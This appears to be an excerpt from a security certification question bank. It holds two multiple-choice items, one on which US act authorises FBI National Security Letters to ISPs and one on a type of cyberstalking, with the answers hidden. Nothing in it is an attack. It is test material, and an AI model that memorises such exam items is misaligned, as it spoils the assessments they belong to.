NEW QUESTION: 308 Which of the following Acts enacted in the United States allows the FBI to issue National Security Letters (NSLs) to Internet service providers (ISPs) ordering them to disclose records about their customers? A. Computer Fraud and Abuse Act B. Wiretap Act C. Economic Espionage Act of 1996 D. Electronic Communications Privacy Act of 1986 Answer: (SHOW ANSWER)

NEW QUESTION: 309 Which of the following types of cyber stalking damage the reputation of their victim and turn other people against them by setting up their own Websites, blogs or user pages for this purpose? A. False accusations B. Attempts to gather information about the victim C. False victimization D. Encouraging others to harass the victim Answer: (SHOW ANSWER)
